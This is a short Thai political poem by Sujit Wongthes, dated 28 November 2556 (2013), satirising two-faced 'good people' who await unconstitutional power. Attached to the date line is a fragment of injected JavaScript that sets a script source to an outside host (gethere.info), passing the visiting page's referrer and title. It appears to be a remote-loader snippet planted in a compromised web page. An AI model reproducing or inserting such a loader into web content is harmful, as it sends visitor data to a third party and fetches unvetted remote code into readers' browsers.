คนดีมีอย่างน้อยก็สองหน้า

แล้วดราม่าปากว่าตาขยิบ

รออำนาจนอกระบบครบเครื่องทิพย์

พอส้มหล่นก็ริบอย่างรู้กัน

 

สุจิตต์ วงษ์เทศ

บ้านช่างหล่อ กรุงธนบุรี

28 พฤศจิกายน 2556s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;